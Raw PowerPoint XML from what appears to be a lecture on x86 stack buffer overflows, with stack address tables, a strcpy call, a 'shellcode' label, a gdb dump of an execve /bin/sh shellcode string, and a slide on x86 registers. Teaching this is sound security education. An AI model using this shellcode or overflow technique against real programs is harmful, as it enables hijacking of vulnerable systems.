                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff660</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff666</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765239" y="332826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 name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224759" y="4641448"/>
            <a:ext cx="4838218" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xbffff87b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xbffff87b:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1\300Phn/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\211\343PS\206\345\211\302\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\001̀1\300\260\001\061\333̀”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) p/x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(0xbffff87b)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$2 = 0x21</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="2001836"/>
            <a:ext cx="2831284" cy="734384"/>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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="185743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0xbffff688</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="896504956"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff87b</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff666</a:t>
                      </a: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219</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319034156"/>
              </p:ext>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0xa</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0xbffff65c</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0xbffff698</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804841f</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff660</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff666</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765239" y="359330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3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="2001836"/>
            <a:ext cx="2831284" cy="734384"/>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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="1857434"/>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0xbffff688</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43325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28" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>x86 Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003529" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two registers are used for high-speed memory transfer operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (source), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/di (destination)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are several 32-bit special purpose registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
